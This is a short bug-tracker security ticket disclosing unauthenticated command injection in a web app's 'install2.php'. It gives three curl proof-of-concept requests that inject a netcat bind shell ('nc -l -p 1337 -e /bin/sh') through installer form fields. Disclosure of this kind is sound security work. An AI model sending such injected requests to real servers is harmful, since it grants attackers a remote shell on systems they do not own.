Multiple remote unauthenticated command execution vulnerabilities in 'install2.php'

Brought to you by: seppler

#3 Multiple remote unauthenticated command execution vulnerabilities in 'install2.php'

Milestone: v1.0 (example)

Status: open

Owner: nobody

Labels: security (1)

Priority: 5

Updated: 2013-10-17

Created: 2013-10-17

Creator: bcoles

Private: No

The 'install2.php' file contains multiple remote unauthenticated command execution vulnerabilities, such as:

curl -i -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'createdb=yes&cpanel=yes&cpusername=\';nc -l -p 1337 -e /bin/sh #' 'http://webtester.example.com/webtester5/install2.php'

curl -i -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'createdb=yes&cpanel=yes&cppassword=\';nc -l -p 1337 -e /bin/sh #' 'http://webtester.example.com/webtester5/install2.php'

curl -i -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'createdb=yes&cpanel=yes&cpdomain=\';nc -l -p 1337 -e /bin/sh #' 'http://webtester.example.com/webtester5/install2.php'

Multiple remote unauthenticated command execution vulnerabilities in 'install2.php'

Group

Searches

Help

#3 Multiple remote unauthenticated command execution vulnerabilities in 'install2.php'

Discussion